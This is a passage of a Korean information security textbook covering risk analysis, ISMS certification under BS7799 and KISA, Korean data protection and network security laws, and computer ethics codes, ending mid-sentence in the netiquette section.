192 다. 위험관리 및 위험분석 (1) 위험관리 및 위험분석 개요 조직 내 체계적인 IT 보안 관리를 위해서 가장 기본적인 것은 정보시스템의 위험을 평가하고 그에 따 른 대책을 강구하는 것으로 크게 위험 평가와 위험 관리라는 두 과정을 통해 이루어진다. o 위험 평가(Risk Assessment)는 조직이 보호해야 할 자산과 함께 위협과 조직이 가진 취약성을 분석 하여 위협이 주는 위험 정도가 얼마인지를 평가하는 과정이다. o 위험 관리(Risk Management)는 측정 및 평가된 위험을 줄이거나 제거하기 위한 과정으로 위험을 일정 수준까지 유지, 관리하는 것으로써, 종종 위험 평가가 위험 관리 개념 내에 포함되기도 한다 (위험 관리 = 위험 평가 + 위험 완화). o 위험 분석(Risk Analysis)이란 위험 관리 부분에서 가장 중요한 역할을 하는 부분이다. 정보시스템과 그 자산의 기밀성, 무결성 그리고 가용성에 영향을 미칠 수 있는 다양한 위협에 대해서 정보시스템 의 취약성을 인식하고, 이로 인해서 인식할 수 있는 예상손실을 분석한다. (2) 위험관리 및 위험분석 (가) 위험분석 수준 및 방법론 결정 위험 분석 방법론이란 조직 내 IT 환경의 위험을 정량적/정성적으로 측정하고 평가하기 위한 절차 및 기술을 의미한다. 이 단계에서는 현재 조직의 정보시스템에 적합한 위험 분석 수준과 함께 방법론을 결정한다. 192
193 (나) 위험 분석 o 자산 분석(평가) 자산 분석은 보호해야 할 조직의 자산을 파악 식별하고 체계적으로 분류하여, 소유하고 있는 자산들의 가치와 중요성을 평가하는 기본 단계이다. 자산이란 조직에서 가치를 부여한 모든 것으로 하드웨어, 소 프트웨어, 데이터베이스, 사용자 및 전산요원, 시스템 관련문서 그리고 통신망 및 관련 장비 등의 유형 자산과 함께 기업의 이미지와 생산성과 같은 무형 자산을 포함한다. - 자산 조사 : 조사할 IT 자산의 범위를 설정하고, IT 자산을 식별 및 분류하여 자산 목록을 작성하는 단계 - 자산 가치 산정 : 해당 자산이 손상되었을 때 조직이 받을 수 있는 영향을 측정하기 위해 IT 자산의 중요도 및 가치를 평가하는 단계 o 취약성 분석(평가) 취약성 분석은 자산 분석의 결과를 바탕으로 하여 자산이 가진 근본적인 취약성을 확인하고 해당 취약 성이 미칠 수 있는 영향을 파악하는 단계이다. 여기에서 취약성이란 정보시스템에 손해를 끼치는 원인 이 될 수 있는 조직, 절차 및 행정, 하드웨어와 소프트웨어의 약점 등을 의미한다. 취약성 자체가 위험이 되지는 않으며, 위협에 의해 취약성이 이용됨으로써 위험이 발생된다. o 위협 분석(평가) 위협 분석은 IT 자산에 영향을 끼칠 수 있는 잠재적인 위협을 파악 식별하고 분류하여 발생 가능성과 손실 시 심각성을 분석하는 단계로써 자산과 취약성 관계를 파악하는 단계이다. 여기에서 위협이란 항 상 일어날 수 있는 사건이나 구성 등으로 조직의 자산에 피해를 줄 수 있는 가능성 있는 잠재적인 요 소를 말한다. - 환경적 재해 위협 : 테러, 폭풍, 홍수 등 - 인적 재해 위협 : 의도적인 위협/비의도적 위협 등 o 대응책 분석(평가) 대응책 분석은 자산과 취약성, 위협과의 관계 분석을 통한 대응책을 파악하는 단계이다. (다) 위험 산출 및 평가 위험 분석 단계에서 얻은 정보를 바탕으로 위험을 산출, 평가하는 단계로써 위험 분석의 최종단계이다. 분석된 결과를 바탕으로 한 가상 시나리오를 적용하여 적절한 대응책을 도출하는 과정까지 포함된다. (라) 보안 정책 수립 위험 분석 결과를 바탕으로 하여 조직 내 정보시스템 보안 정책 및 부문별 상세 보안 정책을 수립하는 단계이다. (마) 대응책 구현 도출된 대응책을 보안 정책에 따라 구현 통제하는 단계이다. 193
194 (바) 결과 평가 결과를 평가한 후 재분석할 것인지 여부를 결정하는 단계이다. 위험 분석 자동화 도구 : 위험 분석 시 소요되는 시간 및 비용을 줄이기 위한 도구로써, 관리자가 위험 분석 결과를 신뢰하기 위해서는 정확한 자료의 입력이 위험분석의 정확한 결과산출의 요인이 된다. 194
195 chapter3. 정보보호 관리 체계 가. 정보보호 관리 체계 개요 디지털 사회에 접어든 오늘날 정보 기술(IT, Information Technology)은 어느 산업이던지 불문하고 기 업 경영의 근간을 이루고 있다. 정보보호는 이제 더 이상 정부기관이나 높은 수준의 보안을 요하는 한 정된 분야의 업체에서만 관심을 가지는 문제가 아니라 모든 기관과기업체에서 반드시 짚고 가야하는 문제로 인식되고 있다. 조직 내에서 전체적인 정보보호는 개별적인 정보보호 제품의 구현만으로 달성될 수 없으며 정보보호 기능을 제공하는 기술과 관리적인 보호대책이 조직 내에서 적절히 융합되어야 한다. 정보보호 관리 체 계(ISMS, Information Security Management System)는 조직 고유의 IT 환경과 정보보호 정책이 적절 히 융합되어 구현 운영되고 있는 시스템을 말한다. 나. 정보보호 관리 체계 인증 정보보호 관리 체계 인증은 조직이 정보보호 관리 체계를 제대로 운영하고 있는지 객관적으로 평가하 고 인증하기 위한 표준화된 방법이다. 여기에서는 대표적인 정보보호 관리 체계 인증 시스템인 BS7799와 KISA에서 정의한 인증 심사 방법론 에 대해서 다루고자 한다. (1) BS7799 o BS 7799 정의 BS 7799(British Standard 7799)는 정보보호 관리 체계에 대한 표준으로, 최상의 정보보호 관리를 위한 포괄적인 일련의 관리 방법에 대하여 요건별로 해석해 놓은 규격이다. BS7799는 정보보호에 대한 인 증이 필요한 조직들의 요청에 의해 지난 1995년에 영국의 정보보호 관리 체계 인증 규격으로 제정되 어 1999년에 개정되었으며, 영국 이외에 호주, 브라질, 네덜란드, 뉴질랜드 그리고 노르웨이 등에서 사 용되고 있다. 1999년 10월에 ISO 표준으로 제안되어 ISO/IEC DIS 이 되었다. 영국 정부에서는 전자정부를 향한 노력을 뒷받침하기 위하여 2001년 3월까지 대부분의 정보시스템에 대하여 BS7799 인증을 받도록 하여 국가 핵심 정보 기반구조를 보호하기 위한 수단으로 활용하고 있다. 산업계에서는 정보보안이 국제시장에서 경쟁 우위를 제공하는 경영전략이 될 수 있다고 인식하고 있으 며, 유럽, 북미, 환태평양권 등 전 세계적으로 BS7799에 대한 높은 관심을 보이고 있다. o BS 7799 구성 정보보호 관리는 보안위험을 식별하고 이러한 위험을 효과적으로 관리할 수 있는 대책을 다룬다. BS7799는 기업이 고객 정보의 기밀성, 무결성 및 가용성을 보장한다는 것을 공개적으로 확인하는데 초점을 둔다. BS7799는 BT, HSBC, Marks and Spencer, Shell International, Unilever 등 주요 업체와 더불어 영국의 상무성 주관으로 "정보보호관리 실무 규칙(A Code of Practice for Information Security Management)"이라는 제목 하에 조직의 정보보안을 구현하고 유지하는 책임을 지는 관리자들이 참조 할 수 있는 보편적인 문서로 사용하도록 개발되었으며, 조직의 보안 표준의 기반이 되도록 고안되었다. 195
196 기업들이 부딪치는 대부분의 상황에 필요한 통제를 식별하기 위한 단일한 참조점을 제공하고 중소기업 은 물론 대기업까지 광범위하게 적용될 수 있도록 하여 공통적인 정보보안관리 문서를 참조함으로써 기업들 간의 네트워킹에 있어서 상호 신뢰가 가능하도록 한다. 물론 이 표준에서 제시하고 있는 통제 들 모두가 모든 상황에 적용될 수 있는 것은 아니며, 개별적인 환경적 또는 기술적 제약조건을 고려하 여 선택하여야 할 것이다. 따라서 이 표준은 지침과 권고 안의 성격을 가지며, BS7799는 크게 두 부분 으로 구성된다. 제1부는 정보보호 관리에 대한 표준적인 실행 지침으로 종합적인 보안 통제 목록을 제시하며, 관리 항 목은 다음 [표 1-7]과 같이 10개의 세션으로 구성된다. 제2부는 정보보호 관리 체계에 대한 표준적인 명세로 ISMS의 구축, 문서화 등을 위한 요구사항을 정 의한 것이다. 196
197 o BS 7799 구축 및 인증 단계 다음 (그림 1-3)은 정보보호 관리 체계 구축 및 인증 단계에 대해 정리한 것이다. o BS7799 인증 스킴 BS7799는 ISO9000과 유사하게 운영되는 "c:cure"라는 인증 스킴이 있다. 사실 ISO9000과 BS7799사이 에는 많은 유사성이 있는데, 예를 들어 ISO9000에서의 품질 정책과 품질관리시스템 대신에 BS7799에 는 정보보안 정책과 ISMS가 존재한다. BS7799는 영국표준협회(BSI/DISC)에서 관리되고 있으며 BS7799 인증을 받기 위해서 해당 정보보호 관 리 체계는 신뢰성 있는 제 삼자인 BS7799 평가자에 의한 감사를 받아야 한다. 평가자는 엄밀한 규칙 에 의해 자격이 부여되어야 하며 평가자가 소속된 기관은 영국인증서비스(UK Accreditation Service)의 인가를 받아야 한다. 197
198 (2) 국내 정보보호관리체계 인증제도 o 정보보호 관리 체계 인증제도의 정의 정보보호 관리 체계 인증제도란 기업(조직 또는 사업장의 일부 또는 전체)이 수립하여 운영하고 있는 정보보호 관리 체계가 일정한 인증심사기준에 적합한지 여부를 제 3자인 인증기관이 객관적이고 독립 적으로 평가하여 기준에 대한 적합성 여부를 보증해주는 제도를 말한다. o 정보보호 관리 체계 인증제도의 법적 근거 정보통신망이용촉진및정보보호등에관한법률 제47조 규정( 정보보호 관리 체계의 인증 )과 시행 규칙에 의거한 것이다. - 정보통신망이용촉진및정보보호등에관한법률 제47조 규정 제47조 (정보보호 관리 체계의 인증) 1 정보통신서비스제공자 및 정보통신서비스를 제공하기 위한 물리적 시설을 제공하는 자는 정보통신 망의 안정성 및 정보의 신뢰성을 확보하기 위하여 수립 운영하고 있는 기술적 물리적 보호조치를 포 함한 종합적 관리체계(이하 정보보호 관리 체계 라 한다)가 당해 서비스에 적합한 지에 관하여 제52조의 규정에 의한 한국정보보호진흥원으로부터 인증을 받을 수 있다. - 정보통신망이용촉진및정보보호등에관한법률 시행 규칙 제6조(정보보호 관리 체계의 인증) 1 법 제47조 제1항의 규정에 의한 정보보호 관리 체계의 인증을 받고자 하는 자는 별지 제2호 서식 의 정보보호 관리 체계 인증신청서에 다음 각 호의 서류를 첨부하여 법 제52조의 규정에 의한 한 국정보보호진흥원(이하 보호진흥원 이라 한다)에 제출하여야 한다. 제7조(인증업무지침 등) 1 보호진흥원은 법 제47조제1항의 규정에 의한 인증업무를 공정하고 객관적으로 수행하여야 한다. 2 보호진흥원의 장은 정보통신부장관의 승인을 얻어 정보보호 관리 체계 인증업무의 시행에 필요한 지침(이하 인증업무지침 이라 한다)을 정하고 이를 공표하여야 한다. 제8조(인증의 사후관리) 보호진흥원은 정보보호 관리 체계의 인증을 받은 자에 대하여 인증업무지침에 따라 재심사 그 밖의 사 후관리를 실시하여야 한다. 제9조(수수료) 법 제47조제1항의 규정에 의한 정보보호 관리 체계의 인증의 수수료는 인증업무지침으로 정하되, 다음 각 호의 요소를 고려하여 산정하여야 한다. 1. 정보보호 관리 체계에 포함되는 종업원의 수 2. 정보보호 관리 체계에 포함되는 주요정보통신설비의 규모 3. 인증심사를 수행하는 직원의 자질과 수 4. 인증심사기간 198
199 제10조(인증표시 및 홍보) 1 법 제47조제3항의 규정에 의한 인증을 나타내는 표시는 보호진흥원의 장이 정하되, 다음 각 호의 사항이 포함되어야 한다. 1. 인증번호 2. 인증기관명 2 정보보호 관리 체계의 인증을 받은 자는 법 제47조제3항의 규정에 의하여 문서 송장 광고 등에 인증받은 내용을 홍보하는 경우에는 인증의 범위와 유효기간이 분명하게 나타나도록 하여야 한다. o정보보호관리체계 인증 심사 절차 다음 (그림 1-5)는 정보보호관리체계 인증업무지침에 따른 인증 심사 절차이다. 다음 [표 1-8]은 각 인증 심사 절차에 대한 주요 수행 내용이다. 199
200 o 정보보호관리체계 인증 심사 기준 국내 정보보호관리체계 인증 심사 기준은 한국인정원(KAB), 한국정보보호진흥원 (KISA)에서 정의한 심사 규격이 있으며 그 중 한국정보보호진흥원에서 정의한 인증 심사 기준은 정보통신망이용촉진및정보보호등에 대한법률 제47조 규정에 의거한 것으로 [표 1-6]의 인증 심사 요소를 참고한다. 200
201 제 3절. 정보보호 법률 및 윤리 chapter1. 정보보호 법률 가. 전자서명법 (1) 목적 전자문서의 안전성과 신뢰성을 확보, 이용을 활성화하기 위하여 전자서명에 관한 기본적인 사항을 정함 (2) 구성 o 제1장 총 칙 o 제2장 공인인증기관 o 제3장 공인인증서 o 제4장 인증업무의 안전성 및 신뢰성 확보 o 제5장 전자서명인증정책의 추진 등 o 제6장 보 칙 (3) 제작 과정 o 1997년 10월 기본 정책방향 결정 -전자상거래 촉진을 위하여 전자서명법, 전자거래기본법 등 제정 추진 결정 o 1998년 7월: 입법 예고 o 1998년 12월: 국회 본회의 통과 o 1999년 2월: 전자서명법 공포 o 1999년 7월: 전자서명법 시행 (4) 전자서명법 주요 내용 o 전자거래의 활성화를 위하여 공인인증기관이 인증한 전자서명에 대하여 법적 효력 부여 o 정보통신부 장관이 공인인증기관을 지정 o 인증업무의 지속성 및 적정성 보장을 위한 공인인증기관 관리제도 o 인증업무의 신뢰성 확보를 위한 인증서 발급 o 인증업무 수행관련 개인정보 보호 o 국가간 인증서에 대한 상호 인정 o 인증기관의 책임과 의무 o 전자서명 및 전자문서 보호 o 전자서명 인증관리센터의 설립 및 운영(한국정보보호진흥원) 201
202 (5) 전자서명법 규정 o 공인인증기관의 안전성 확보(법 제18조의3) - 인증업무시설의 안전성 확보를 위하여 정보통신부령이 정하는 보호조치 강구 o 인증업무에 관한 설비의 운영(법 제19조) - 공인인증서의 유효 여부 확인을 위하여 인증업무 시설 및 장비의 안전운영 - 한국정보보호진흥원에 의한 시설 및 장비의 안전운영 여부에 대한 정기점검 o 전자서명생성정보의 관리(법 제21조) - 공인인증기관은 자신이 이용하는 전자서명생성정보를 안전하게 보관 관리 - 전자서명생성정보가 분실 훼손 또는 도난 유출되거나 훼손될 수 있는 위험을 인지한 때에는 지체 없이 그 사실을 한국정보보호진흥원에 통보하고, 인증업무의 안전성과 신뢰성을 확보할 수 있는 대책을 마련 (6) 전자서명법 시행령 및 시행규칙 o 공인인증기관 지정요건 o 공인인증기관 지정절차 o 기타 공인인증기관 관리에 관한 세부사항 나. 정보통신망 이용촉진 및 정보보호 등에 관한 법률 (1) 목적 o 정보통신망의 이용 촉진 o 정보통신서비스를 이용하는 자의 개인정보 보호 o 정보통신망을 건전하고 안전하게 이용할 수 있는 환경을 조성 (2) 구성 o 제1장 총 칙 o 제2장 정보통신망의 이용촉진 o 제3장 전자문서중계자를 통한 전자문서의 활용 o 제4장 개인정보의 보호 o 제5장 정보통신망에서의 청소년보호 등 o 제6장 정보통신망의 안정성 확보 등 o 제7장 국제협력 o 제8장 보 칙 202
203 (3)주요 내용 o 정보통신망의 안전성 확보(법 제45조) o 정보통신망의 안전성 확보(법 제45조) - 정보통신서비스제공자는 정보통신서비스의 제공에 사용되는 정보통신망의 안정성 및 정보의 신뢰성을 확보하기 위한 보호조치를 마련하여야 함 - 정보통신부장관은 정보보호지침 고시, 준수 권고 o 집적된 정보통신시설의 보호(법 제46조) - 타인의 정보통신서비스제공을 위하여 집적된 정보통신시설을 운영 관리하는 사업자는 정보통신시설의 안정적 운영을 위하여 정보통신부령이 정하는 바에 의한 보호조치를 취하여야 함 - 피해의 보상을 위하여 보험에 가입 o 정보보호 관리 체계의 인증(법 제47조) - 정보통신서비스제공자 및 이를 위한 물리적 시설을 제공하는 자는 수립 운영 하고 있는 기술적 물리적 보호조치를 포함한 종합적 관리체계 (정보보호 관리 체계)가 당해 서비스에 적합한지에 관하여 한국정보보호진흥원 으로부터 인증을 받을 수 있음 (4) 개인정보보호규정 정보통신망 이용촉진 및 정보보호에 관한 법률에 제시된 개인정보 관련 10개 규정 항목은 다음과 같다. o 개인정보 보호정책의 공시 여부 o 개인정보 수집 시 이용자 동의 o 개인정보 수집 제한 o 이용자 동의 없이 제3자와의 정보공유 및 제공 금지조항 명시 여부 o 영업양수 등의 통지 o 개인정보관리 책임자의 지정 o 기술적, 관리적 보호조치 o 개인정보의 파기 o 개인정보에 관한 동의의 철회. 열람. 정정 o 미성년자 정보보호 - 개인정보보호에 대한 규정 준수 상황의 주기적 조사 - 인터넷 쇼핑몰 등의 법령의 규정 수용 현황 다. 정보통신기반보호법 (1) 목적 o 전자적 침해행위로부터 금융, 통신, 운송 그리고 에너지 등 사회기반시설의 정보통신시스템을 보호하기 위한 예방 대응체계 구축 203
204 (2) 적용 범위 o 국가, 공공기관 외에 경제, 사회적 파급 효과가 큰 민간의 정보통신시스템 포함 o 전자적 침해에 대한 대책, 정보통신시스템 설치 장소 및 관리자에 대한 보호대책 o 정보통신 기반시설 - 국가안전보장 행정 국방 치안 금융 통신 운송 에너지 등의 업무와 관련된 전자적 제어 관리시스템 및 정보통신망이용촉진 및 정보보호 등에 관한 법률 제2조 제1항 제1호의 규정에 의한 정보통신망 o 전자적 침해행위 - 정보통신기반시설을 대상으로 해킹, 컴퓨터바이러스, 논리 메일폭탄, 서비스 거부 또는 고출력 전자기파 등에 의하여 정보통신기반시설을 공격하는 행위 (3) 주요 내용 o 국가기관 및 지방자치단체의 기술지원 기관(법 제7조 제1항) - 국가기관 또는 지자체의 장인 관리기관의 장이 필요하다고 인정하거나, 위원회의 위원장이 특정 기관의 보호대책 미흡으로 국가안전보장이나 경제사회 전반에 피해가 우려된다고 판단하여 그 보완을 명하는 경우 보호대책 수립 및 침해사고 예방, 복구에 대한 기술적 지원을 요청할 수 있 음 o 지원기관(령 제12조) - 국가기관 : 국가정보원, 국군기무사(국방 분야) - 전문기관 : 국가보안기술연구소, 한국정보보호진 흥원, 정보보호전문업체 o 취약성 분석 평가 시기 - 최초 지정 후 6개월 이내 실시 - 매 2년마다 실시 o 취약성 분석 평가 방법 - 취약성 분석 평가 기준 제정, 관계중앙행정기관의 장에게 통보(정통부 관계중앙행정기관과 국정 원 협의하여 제정) - 자체 전담반을 구성하거나, 외부기관에 위탁 - 위탁기관 : 한국정보보호진 흥원, 정보보호 전문업체, 한국전자통신연구원(국가 보안기술연구소), 정보공유분석센터 o 보호대책 수립(법 제5조) - 주요 정보통신 기반시설 관리기관의 장은 취약성 분석 평가 결과에 따라 보호대책을 수립하 고, 매년 3월말까지 이를 중앙행정기관에 제출 o 분야별 보호계획 수립(법 제6조) - 정보통신부 장관이 매년 3월말까지 다음 연도의 보호계획 작성지침을 관계중앙 행정기관의 장에 게 통보 - 각 중앙행정기관의 장은 소관분야 관리기관의 보호대책을 종합하여 보호계획을 수립하고, 매년 5월말까지 이를 위원회에 제출하여 9월말까지 확정 - 위원회의 위원장이 보안이 요구된다고 인정하는 사항에 대하여 심의를 받지 않을 수 있음 204
205 다음 [표 1-8]은 정보통신기반보호법과 정보통신망이용촉진 및 정보보호 등의 관한 법률간의 처벌 유 형에 따른 처벌 내역을 비교한 것이다. 라. 공공기관의개인정보보호에관한법률 (1) 목적 o 공공기관의 컴퓨터에 의하여 처리되는 개인정보의 보호를 위하여 그 취급에 관하여 필요한 사항을 정함으로써 공공업무의 적정한 수행을 도모함과 아울러 국민의 권리와 이익을 보호함 (2) 정의 이 법에서 사용하는 용어의 정의는 다음과 같다. o 공공기관 : 국가행정기관 지방자치단체 기타 공공단체 중 대통령령이 정하는 기관 o 개인정보 : 생존하는 개인에 관한 정보로서 당해 정보에 포함되어 있는 성명 주민등록번호 등의 사항에 의하여 당해 개인을 식별할 수 있는 정보(당해 정보만으로는 특정개인을 식별할 수 없더라도 다른 정보와 용이하게 결합하여 식별할 수 있는 것을 포함한다) o 처리 : 컴퓨터를 사용하여 정보의 입력 저장 편집 검색 삭제 및 출력 기타 이와 유사한 행위, 다만, 문 장만을 작성하는 등의 단순 업무처리를 위한 행위로서 대통령령이 정하는 행위를 하는 것을 제외 205
206 o 개인정보파일 : 특정 개인의 신분을 식별할 수 있는 사항에 의하여 당해 개인정보를 검색할 수 있도록 체계적으로 구성된 개인정보의 집합 물로서 컴퓨터의 자기테이프 자기디스크 기타 이와 유사한 매체에 기록된 것 (3) 주요 내용 o 개인 정보의 수집 - 공공기관의 장은 사상 신조 등 개인의 기본적 인권을 현저하게 침해할 우려가 있는 개인정보를 수집하여서는 아니 된다. 다만, 정보주체의 동의가 있거나 다른 법률에 수집대상 개인정보가 명 시되어 있는 경우에는 그러하지 아니하다. o 개인정보파일의 보유범위(제5조) - 공공기관은 소관업무를 수행하기 위하여 필요한 범위 안에서 개인정보파일을 보유할 수 있다. o 개인 정보의 안전성 확보 등(제9조) - 공공기관의 장은 개인정보를 처리함에 있어서 개인정보가 분실 도난 누출 변조 또는 훼손되지 아 니하도록 안전성 확보에 필요한 조치를 강구하여야 한다. - 공공기관의 장은 처리정보의 정확성 및 최신성을 확보하도록 노력하여야 한다. - 공공기관으로부터 개인정보의 처리를 위탁받은 자에 대하여도 제1항의 규정을 준용한다. o 개인정보취급자의 의무(제11조) - 개인정보의 처리를 행하는 공공기관의 직원이나 직원이었던 자 또는 공공기관으로부터 개인정보의 처리업무를 위탁받아 그 업무에 종사하거나 종사하였던 자는 직무상 알게 된 개인정보를 누설 또는 권한 없이 처리하거나 타인의 이용에 제공하는 등 부당한 목적을 위하여 사용하여서는 아니 된다. 마. 통신비밀보호법 (1) 목적 o 통신 및 대화의 비밀과 자유에 대한 제한은 그 대상을 한 정하고 엄격한 법적 절차를 거치도록 함 으로써 통신 비밀을 보호하고 통신의 자유를 신장함 (2) 정의 이 법에서 사용하는 용어의 정의는 다음과 같다. <개정 > o 통신 : 우편물 및 전기통신 o 우편물 : 우변 법에 의한 통상우편물과 소포우편물 o 전기통신 : 전화 전자우편 회원제정보서비스 모사전송 무선호출 등과 같이 유선 무선 광선 및 기타의 전자적 방식에 의하여 모든 종류의 음향 문언 부호 또는 영상을 송신하거나 수신하는 것 o 검열 : 우편물에 대하여 당사자의 동의 없이 이를 개봉하거나 기타의 방법으로 그 내용을 지득 또 는 채록하거나 유치하는 것 o 감청 : 전기통신에 대하여 당사자의 동의 없이 전자장치 기계장치 등을 사용하여 통신의 음향 문언 부호 영상을 청취 공독하여 그 내용을 취득 또는 채록하거나 전기통신의 송 수신을 방해하 는 것 o 감청설비 : 대화 또는 전기통신의 감청에 사용될 수 있는 전자장치 기계장치 기타 설비 o 통신사실 확인자료 : 가입자의 전기통신일시, 전기통신개시 종료시간, 발 착신 통신번호 등 상대방 의 가입자번호 그리고 사용도수 그밖에 대통령령으로 정하는 전기통신사실에 관한 자료 206
207 (3) 주요 내용 o 통신 및 대화비밀의 보호(제3조) - 누구든지 이 법과 형사소송법 또는 군사법원법의 규정에 의하지 아니하고는 우편물의 검열 전 기통신의 감청 또는 통신사실 확인 자료의 제공을 하거나 공개되지 아니한 타인간의 대화를 녹 음 또는 청취하지 못한다. 다만, 다음 각 호의 경우에는 당해 법률이 정하는 바에 의한다. <개정 , > - 우편물의 검열 또는 전기통신의 감청(이하 "통신제한조치"라 한다)은 범죄수사 또는 국가안전 보장을 위하여 보충적인 수단으로 이용되어야 하며, 국민의 통신 비밀에 대한 침해가 최소한에 그치도록 노력하여야 한다. <신설 > chapter2. 정보보호 윤리 인터넷은 국가적인 기반 시설이므로 이에 대한 가용성 유지는 사회적 또는 군사적으로도 매우 중요한 의미를 갖게 되었다. 이러한 중요한 자원을 무책임하게 사용하는 것은 기술사회 기반을 흔드는 커다란 피해결과를 발생시킬 수 있어 여러 기관에서는 컴퓨터 사용 시 지켜야 할 윤리는 무엇인지 규정하였 다. 다음은 여러 기관에서 지정한 윤리 강령에 대한 간단한 소개이다. 가. 정보통신 윤리위원회 윤리 강령 정보시대가 다가오고 있다. 정보 통신 기술의 발달로 시간과 공간의 장벽이 무너지고 세계가 하나 되 는 시대를 맞고 있다. 우리 모두는 정보시대의 주인이 되어 유익한 정보를 서로 나누고 인류의 행복과 높은 이상이 실현되는 사회를 만들어야 할 책임이 있다. 모든 정보는 정확하고 성실하게 활용되어야 하며 인간의 존엄성을 지키고 삶의 품위를 높이는데 이용 되어야 한다. 개인의 창의력과 조직의 능률을 향상시키며 나라의 발전과 민족문화의 창조적 계승을 도 모하고 세계가 더불어 번영하는 데 이바지하도록 정보 문화를 가꾸어 나가야 한다. 우리는 정보의 제 공과 활용에 있어 서로의 인권을 존중하고 나라의 법질서를 준수하며 국민 정서에 맞는 미풍양속을 바 로 세우는 시민의식 형성에 앞장선다. 바른 언어를 사용하고 공중도덕을 지킴으로써 정보 질서를 확립 하고 국가의 기밀이나 개인의 사생활과 지적재산권은 보호하되 유용한 정보는 함께 나누는 마음가짐이 새로운 가치관으로 뿌리내리도록 노력한다. 아울러 모든 개인과 지역에 정보의 공개와 활용의 혜택이 골고루 돌아가도록 힘씀으로써 밝고 정의로 운 복지 사회를 이룩하는 데 최선을 다한다. 우리는 정보시대를 살아가는 민주 시민으로서 건전한 윤 리가 정보사회의 기반을 이루어야 한다는 데 뜻을 모으고 이 뜻이 실현되도록 성실하게 노력할 것을 다짐한다. 나. 네티즌 윤리 강령 정보통신 환경의 변화에 따라 사이버 공간의 이용이 급증하고 있다. 네티즌은 사이버 공간에서 유익한 정보를 서로 나누고 건전한 인간관계를 형성하며, 다양한 경험을 쌓는다. 또한 사이버 공간을 통해 정 보사회의 성숙한 인간으로 성장하며, 인류사회 발전에 기여한다. 207
208 사이버 공간의 주체는 네티즌이다. 네티즌은 사이버 공간에서 표현의 자유와 권리를 가지고 있으며, 동 시에 의무와 책임도 지니고 있다. 이러한 권리가 존중되지 않고 의무가 이행되지 않을 때 사이버 공간 은 무질서와 타락으로 붕괴되고 말 것이다. 이에 사이버 공간을 모두의 행복과 자유, 평등이 실현되는 공간으로 발전시킬 수 있도록 '네티즌 윤리 강령'을 제정하고 이를 실천할 것을 다짐한다. o 네티즌 기본 정신 - 사이버 공간의 주체는 인간이다. - 사이버 공간은 공동체의 공간이다. - 사이버 공간은 누구에게나 평등하며 열린 공간이다. - 사이버 공간은 네티즌 스스로 건전하게 가꾸어 나간다. o 행동 강령 - 우리는 타인의 인권과 사생활을 존중하고 보호한다. - 우리는 건전한 정보를 제공하고 올바르게 사용한다. - 우리는 불건전한 정보를 배격하며 유포하지 않는다. - 우리는 타인의 정보를 보호하며, 자신의 정보도 철저히 관리한다. - 우리는 비속어나 욕설 사용을 자제하고, 바른 언어를 사용한다. - 우리는 실명으로 활동하며, 자신의 ID로 행한 행동에 책임을 진다. - 우리는 바이러스 유포나 해킹 등 불법적인 행동을 하지 않는다. - 우리는 타인의 지적재산권을 보호하고 존중한다. - 우리는 사이버 공간에 대한 자율적 감시와 비판활동에 적극 참여한다. - 우리는 네티즌 윤리강령 실천을 통해 건전한 네티즌 문화를 조성한다. 다. 정보통신사업자 윤리 강령 우리는 미래의 정보사회를 이끌어 갈 정보통신 사업자로서 건전한 정보통신 문화 창달의 책임과 의무 를 성실히 수행할 것을 다짐하며 그 구체적인 실천 강령을 다음과 같이 선포한다. o 우리는 정보통신 사업자로서 보람과 긍지를 가지고 올바른 정보를 제공하여 국가사회 발전에 이바지한다. o 우리는 사회적 도덕성에 입각하여 건전한 정보가 유통될 수 있는 환경을 구축한다. o 우리는 양질의 정보를 제공함으로써 삶의 질을 높이는데 최선을 다한다. o 우리는 불건전 정보가 유통되지 않도록 스스로 자제하며 사회공익이 우선될 수 있는 풍토를 조성한다. o 우리는 인권과 사생활을 존중하고 지적재산권을 보호함으로써 정보 사회의 질서를 확립한다. o 우리는 비판적 시각을 중시하고 상호협력을 통하여 자율적인 정보통신문화 정착에 앞장선다. o 우리는 건전한 정보통신 문화의 세계화를 추구하며 국익차원의 해 외 진출에 주력한다. o 우리는 정보통신 윤리강령에 따라 관계법령과 규정을 준수하여 정보 통신인으로서의 책임과 의무를 다한다. 라. CEI 윤리 원칙 CEI(Computer Ethics Institute)는 컴퓨터 윤리정보를 일반 대중에게 전파, 정책의 분석과 비평, 컴퓨터 기술의 사용에 있어서의 윤리에 한 인식과 검토, 컴퓨터 기술의 사용과 개발에 윤리원칙 적용 등을 목 적으로 설립된 단체이다. 208
209 CEI에서 만들어 발표한 10가지 윤리원칙은 다음과 같다. 1. 다른 사람에게 피해를 입히기 위한 목적으로 컴퓨터를 사용하지 않는다. 2. 다른 사람의 컴퓨터 작업을 방해하지 않는다. 3. 다른 사람의 컴퓨터 파일을 허락 없이 복사하거나 읽지 않는다. 4. 절도의 목적으로 컴퓨터를 사용하지 않는다. 5. 잘못된 증거를 제시하기 위하여 컴퓨터를 이용하지 않는다. 6. 소프트웨어를 불법복제 하거나 불법복제 소프트웨어를 사용하지 않는다. 7. 동의나 승인 없이 다른 사람의 컴퓨터 자원을 사용하지 않는다. 8. 다른 사람의 지적 재산권을 침해하지 않는다. 9. 자신이 설계한 시스템 또는 자신이 만든 프로그램이 사회에 미치는 영향에 대하여 먼저 깊이 생각 한다. 10. 타인을 존중하는 마음으로 컴퓨터를 사용하여야 한다. 마. 네티켓 기본 원칙 가상공간에서는 익명성, 쌍방향성 등 그 문화적 특성으로 인해 대부분의 사람들이 실생활에서 생각지 못했던 부분에 대해 약간의 실수를 범할 우려가 있다. 별다른 의미 없이 오해를 사거나 다른 사람들의 감정을 해칠 수 있고, 의도했던 바와는 달리 화를 내게 할 경우도 있다. 특히 통신상에 연결된 상대방이 실제 사람이라는 사실을 간혹 간과하게 되고, 이로 인해 서로 주고받 는 메시지가 실제 사람의 음성이라기보다는 단지 스크린상의 문자 정보로 생각하기 쉽다. 따라서 가상 공간의 문화적 특성을 이해함과 동시에 이에 걸맞은 행동양식을 갖추어 나가는 것이 무엇보다 중요하 다. 다음에 나열하는 규칙들은 가상공간 상에서 우리가 갖추어야 할 행동양식에 대한 원칙들로 버지니아 셰어(Virginia Shea)가 제시한 "The Core Rules of Netiquette"에 기초를 두고 있다. 현재 국내외적으로 네티켓을 위해 특별히 정해진 원칙이 있는 것은 아니나, 나름대로 일정한 논리를 가지고 원칙들을 마련해 나감으로써 건전한 통신 이용환경을 조성해 나가고 있다. 다음은 네티켓 기본 원칙 10가지이다. o 1원칙 : 인간임을 기억하라 o 2원칙 : 실제생활에서 적용된 것처럼 똑같은 기준과 행동을 고수하라. o 3원칙 : 현재 자신이 어떤 